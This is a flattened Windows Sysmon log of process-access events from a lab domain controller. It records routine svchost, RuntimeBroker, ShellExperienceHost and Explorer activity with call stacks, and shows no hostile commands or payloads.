13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.445{59A5CD1D-93F9-6005-F104-00000000A301}4540868C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 